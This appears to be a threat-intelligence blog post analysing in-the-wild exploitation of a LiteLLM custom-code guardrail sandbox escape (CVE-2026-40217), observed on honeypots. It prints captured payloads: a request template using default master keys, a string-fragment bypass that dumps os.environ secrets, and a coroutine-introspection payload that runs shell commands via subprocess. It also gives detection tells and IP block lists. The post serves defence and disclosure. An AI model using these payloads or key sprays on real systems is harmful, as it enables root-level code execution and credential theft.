• Zenity Labs
  • Posts
  • Threat Actors Are Trying to use LiteLLM's Guardrail Tester to Run Code as Root

Threat Actors Are Trying to use LiteLLM's Guardrail Tester to Run Code as Root

A closer look at custom-code guardrail sandbox-escape (CVE–2026-40217) activity in the wild

Between 2026-04-15 and 2026-05-24, our honeypot sensors recorded 569 POST requests to /guardrails/test_custom_code. Each one guessed a proxy master key, otherwise known as the key to the AI Gateway, and carried a Python payload, from a {'probe':1} capability check to full sandbox-escape exploit payloads.

The activity maps to CVE-2026-40217, a sandbox-escape RCE in LiteLLM's custom-code guardrail (affected 1.81.8 up to but not including 1.83.10, CVSS 8.8, disclosed 2026-04-10, fixed 2026-04-15 in 1.83.10). The official LiteLLM Docker image runs the proxy as root, so successfully escaping it leads to root-level RCE. LiteLLM does ship a non-root image variant, which is exactly the hardening we recommend below. The first probes recorded by our sensors landed the same day the fix shipped, 2026-04-15

The guardrail tester as attack surface

A LiteLLM custom-code guardrail is a Python function that inspects traffic through a proxy and returns a verdict of allow, block or modify. Benign uses are things like PII redaction or blocking secrets in prompts. The /guardrails/test_custom_code endpoint lets a user test that functionality against sample input before deploying it, and the code runs inside a hand-rolled sandbox. Every request has this shape:

POST /guardrails/test_custom_code HTTP/1.1
Host: <litellm-host>:4000
Authorization: Bearer sk-1234
Content-Type: application/json

{
"custom_code": "<Python code>",
"test_input": {"messages": [{"role": "user", "content": "t"}]}
}

The sandbox escape: CVE-2026-40217

The sandbox is essentially a text deny-list: it scans the submitted source for forbidden words like import, code and globals and refuses them. CVE-2026-40217 defeats that filter in two ways. The code runs with an exec() whose globals lack builtins, so Python re-injects the full builtins (__import__, open, eval). And the deny-list falls the moment an attacker stops writing the forbidden words literally and rebuilds them at runtime from string fragments (e.g.: "_"+"_gl"+"ob"+"als"+"_"+"_" becomes "__globals__"). 

From there it abuses a quirk of Python's object model: a generator or coroutine object exposes internal attributes (gi_code, cr_frame) that still hold references to the surrounding scope. By creating a dummy generator just to read those attributes, the payload climbs from a harmless object back to Python's real builtins and its import function - and then simply calls import os.

Design pattern exposure

  • Four design choices combine to create this vulnerability:

  • The endpoint executes user-supplied Python on the server.

  • Its sandbox is a keyword deny-list, which string concatenation trivially evades.

  • The default Docker image runs as root, so an escape becomes root RCE.

  • The attacker first needs a valid master key, which is why the activity we’ve seen pairs the exploit with a LiteLLM deployment where the key is left at a guessable default (for example, LiteLLM’s default sk-1234 master key value)

Suspicious activity breakdown

The activity which targeted our sensors had a few elements stapled together  

The different requests carried 47 distinct guessed Authorization: Bearer sk-... values (plus 64 requests with empty Authorization headers), all LiteLLM-themed defaults like sk-1234, sk-litellm-master-key, sk-admin, and sk-changeme. Why try defaults at all?  A master key left at a documented default: sk-1234 is LiteLLM's own default example key (in the virtual-keys docs and shipped in .env.example), and an install that kept it is authenticated by a value the attacker already knows. The spray pattern across our LiteLLM sensors reads as hunting for default-key states wherever they exist. 

Recon came first, exploit later. The volume arrived up front: 520 identical def apply_guardrail(i,r,t): return {'probe':1} requests on 2026-04-15 , a go/no-go check that answers “is my key valid and does this endpoint run my Python?” in one shot. A 200 that echoes the return value answers two questions at once: is my key valid, and does this endpoint actually run the Python I send and hand me back its result? 

Then, across May, the real payloads arrived from different IPs:

The os.environ exfiltration payload

The goal of this was to read the proxy's environment variables, where LiteLLM stores its provider and master API keys. The payload uses the sandbox escape described above to reach import. It imports os, and serializes the whole environment into the response - filtering for names like key, secret, api, aws, openai, anthropic, and master

The payload reads as follows:

gn = "_"+"_gl"+"ob"+"als"+"_"+"_"        # "__globals__", never written literally
# ... swap a throwaway generator's gi_code / co_names, walk back to the real import ...
return {"env": json.dumps(dict(os.environ))}   # every provider / master / AWS key

We also witnessed a simpler variant which skips the obfuscation and just filters os.environ for secret-named keys (key, secret, token, api, aws, openai, anthropic, master, database); because it writes import os literally, the deny-list catches it.

Command execution

This variant runs the command through subprocess.Popen(..., shell=True) so it keeps running after the response. The payload also came with a Chinese comment noting it dodges the endpoint's roughly 5-second timeout:

def apply_guardrail(inputs, request_data, input_type):
   coro = http_request("http://127.0.0.1")
   imp = coro.cr_frame.f_builtins["__import__"]
   sp = imp("subprocess")
   cmd = inputs["texts"][0] if inputs.get("texts") else "id"
   sp.Popen(cmd, shell=True)   # 不等待进程结束 — doesn't wait, dodges the 5s limit
   coro.close()
   return block("executed in background")

Another variant had the simplest form, import os; x=os.popen('id').read(), which the deny-list catches; the introspection payloads are how the others get around it.

Verifying the attack

To confirm this is indeed a working exploit caught in the wild and not just suspicious-looking code, we reproduced the attacks in a lab. We replayed the captured payloads on a vulnerable LiteLLM (1.83.0, in the affected 1.81.8–1.83.9 range) configured with a master key and a planted secret SECRET_CANARY=CANARY_LEAKED_OK_777 in the proxy's environment. a plain probe:1 returned {"success":true, "result":{"probe":1}}, confirming the endpoint runs submitted code, while a literal import os was still blocked by the deny-list ("Security violation: import statements are not allowed"). The plain probe and success message looked similar to the suspicious activity breakdown above.

Additionally, when verifying the two captured escape payloads we noticed they indeed sailed right through litellm’s sandbox. The string-fragment env-dump payload returned the proxy's full environment, including our planted CANARY_LEAKED_OK_777 secret. Additionally the subprocess.Popen (seen above in the suspicious activity breakdown) payload executed its command. This confirms the payload as a working CVE-2026-40217 exploit: The deny-list stops the obvious keywords, but the captured payloads rebuild them at runtime, escape the sandbox, and both read secrets and run commands. 

Assessment

By their shape, these are CVE-2026-40217 exploitation attempts rather than generic scanning: every request hits the CVE's exact endpoint with LiteLLM's apply_guardrail() signature, and the escape payloads perform the specific deny-list bypass the advisory describes. The activity splits into high-volume capability probing (probe:1, from 173.249.198.201 and 108.78.4.10) and lower-volume, hand-crafted exploitation (the os.environ and command-execution escapes). Six of the eight source IPs also appear in our LiteLLM control-plane findings, with several hitting the guardrail endpoint, /config/update, and the api_base SSRF on the same day. 

Running the source IPs through VirusTotal tells us more about who we're dealing with. The hands-on exploit senders are already flagged as malicious: 

What to block

Abused endpoints

A low-traffic admin endpoint that should never see internet traffic. Be sure to alert on any external POST to it:

  • /guardrails/test_custom_code

Request-body payloads

Custom-guardrail code that does anything beyond returning a verdict is suspicious. Watch for:

  • Capability probe: a guardrail that just returns a marker like {'probe':1}.

  • Sandbox-escape tells: string-fragment dunder reconstruction ("_"+"_gl"+"ob"+…), generator/coroutine internals (e.g., gi_code, cr_frame, f_builtins), dict(os.environ), or subprocess.Popen(..., shell=True).

  • Master-key spray: repeated requests cycling documented/guessable sk-… bearer values (sk-1234, sk-litellm-master-key, sk-admin, sk-changeme, etc.).

IP addresses

  • 173.249.198.201

  • 108.78.4.10

  • 216.26.226.182

  • 125.81.162.148

  • 5.34.179.24

  • 164.52.192.134

Recommendations

  • Upgrade to LiteLLM 1.83.10 or later, which replaces the deny-list with a real RestrictedPython sandbox.

  • Rotate the master key off any default or guessable value. 

  • Keep the control plane off the public internet, and run the proxy as a non-root user (override the default Docker user) to blunt a successful escape.

Why it matters

  • CVE-2026-40217 is a sandbox-escape remote-code-execution flaw in LiteLLM's custom-code guardrail. What we're seeing is the CVE practiced in the wild, within five days of its disclosure, with hundreds of requests spanning reconnaissance, sandbox-escape techniques, and full operating-system command execution

    The impact is concrete: A valid master-key, as defined above, only gets you into the proxy’s gateway. CVE-2026-40217 is what turns that limited access into full control of the server underneath: the escape and reads the host's entire environment, whether its the raw provider API keys (usable directly, off-platform), cloud credentials, and/or the database connection string. 

Reply

or to participate.